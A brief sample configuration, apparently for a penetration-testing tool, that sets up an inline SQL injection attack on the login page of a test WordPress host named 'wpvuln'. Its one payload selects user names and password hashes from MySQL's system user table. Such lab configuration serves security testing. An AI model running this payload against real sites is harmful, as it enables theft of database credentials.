# This sample assumes a mysql database and user with read permission
# on system tables.
[
    {
        # This uses the inline attribute on wpvuln to 
        # send a single SQL select statement. 
        "attack": "sql_inline",
        "base_url": "http://wpvuln/wp-login.php",
        "attribute": "inline",
        "statements": ["select user,password from mysql.user"]
    }
]
